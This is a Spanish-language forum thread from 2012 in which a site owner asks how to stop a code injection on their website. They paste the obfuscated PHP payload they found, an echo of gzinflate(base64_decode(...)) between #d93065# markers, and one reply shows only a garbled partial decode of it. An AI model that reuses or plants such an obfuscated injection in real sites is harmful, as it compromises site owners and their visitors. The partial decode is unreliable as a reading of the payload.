Inyección de código, como lo soluciono?

xarmagedonx · #1 (**permalink**) 20/03/2012, 10:12

Hola a todos, hoy a la mañana note algo raro en mi web, ya que no podía acceder desde mi celular, cuando volvi a mi casa, intente ingresar y marcaba error.

Examiné el index y me habían inyectado un código como este: encode(64(( y aca un monton de texto)))

No pude copiarlo porque lo borre enseguida para que volviera a funcionar. Pero como puedo evitar este tipo de ataques??. Yo habia puesto en el código algunas recomendaciones que dan para evitar inyecciones, pero supongo que el problema estará en el paginador.

Si necesitan la web es la N°2 de mi firma. Saludos y gracias!!

EDITO: aca tengo el codigo...

Código MySQL:

Ver original#d93065#
echo(gzinflate(base64_decode("TYvLDYAgDEBXIR2A3g1yd4yKjUIQSalGt9eEi9f3cS1IrGr0qTyC8q2Y6KJOwWQq60nrp/60SRhhU60DYizKIrzYcOyWBHHav75wwxxnIXlsamC8wz77Fw==")));
#/d93065#

quimfv · #2 (**permalink**) 21/03/2012, 07:57

Lo que se llama inyección de código se suele hacer atraves de formularios... tienes alguno.

base64_decode("...")=M닍ࠌ@W!ލrw슍BI醷ׄ뗷q-H쪴鼂⭘袎d*뉫羴IaS탢,ʢ옰얄qڿg!ylj`샾뗀

http://paraisolinux.com/decodificar-...nflate-base64/